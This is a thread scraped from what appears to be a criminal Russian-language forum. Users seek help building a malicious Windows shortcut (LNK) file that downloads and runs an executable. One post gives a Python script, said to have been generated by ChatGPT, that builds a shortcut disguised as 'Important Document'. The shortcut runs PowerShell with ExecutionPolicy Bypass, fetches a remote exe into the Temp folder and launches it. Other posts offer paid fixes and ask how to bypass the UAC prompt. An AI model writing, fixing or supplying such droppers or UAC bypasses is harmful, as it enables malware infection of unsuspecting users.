What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

LNK файл

hk111

Midle Weight
Депозит
$0
Пожалуйста, обратите внимание, что пользователь заблокирован
Как с помощью lnk скачать exe файл который размещен на хостинге/в облачном хранилище, поместить его в папку temp и выполнить?
 
ondatra227 сказал(а):
Можешь использовать вызов повершелла
Пожалуйста, обратите внимание, что пользователь заблокирован

есть какие то примеры?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker
Python:
Скопировать в буфер обмена
import pylnk

sample

def create_malicious_lnk(filename):
# Define the target executable (e.g., Windows Calculator)
target_exe = "C:\\Windows\\System32\\calc.exe"

# Define the URL of the remote executable (e.g., a potentially malicious file)
remote_url = "http://example.com/malicious.exe"

# Create a shortcut
link = pylnk.for_file(target_exe)
link.description = "Important Document"
link.arguments = "/c powershell -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest '{}' -OutFile 'C:\\Windows\\Temp\\malicious.exe'; Start-Process 'C:\\Windows\\Temp\\malicious.exe'".format(remote_url)

link.icon = target_exe
link.save(filename)

create_malicious_lnk("malicious.lnk")
 
Cyc199_77 сказал(а):
here is a script to create an LNK file that downloads and executes exe
Requirements : Python 2.7.2 , pylnk module
not properly tested , Made by CHATGPT
inspierd by : https://github.com/carnal0wnage/python_lnk_maker
Python:
Скопировать в буфер обмена
import pylnk

sample

filename

target_exe


remote_url


link pylnkfor_filetarget_exe
linkdescription
linkarguments .format(remote_url)

linkicon target_exe
linksavefilename

create_malicious_lnk
Нажмите, чтобы раскрыть...

Code not working
 
ondatra227 сказал(а):
Code not working
Пожалуйста, обратите внимание, что пользователь заблокирован

what was the issue


I know there are experts here please help us..
Последнее редактирование: 29.08.2023
 
Пожалуйста, обратите внимание, что пользователь заблокирован
any experts here in building LNK files ?
 
Cyc199_77 сказал(а):
any experts here in building LNK files ?
Пожалуйста, обратите внимание, что пользователь заблокирован

write in PM or TOX, ready to fix & guaranteed working.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Are you suggesting to buy something .. we want to learn not buy a product
 
Пожалуйста, обратите внимание, что пользователь заблокирован
при запуске LNK мы можем обойти окно "разрешить этому приложению вносить изменения на вашем устройстве"? какие аргументы использовать?
 
Top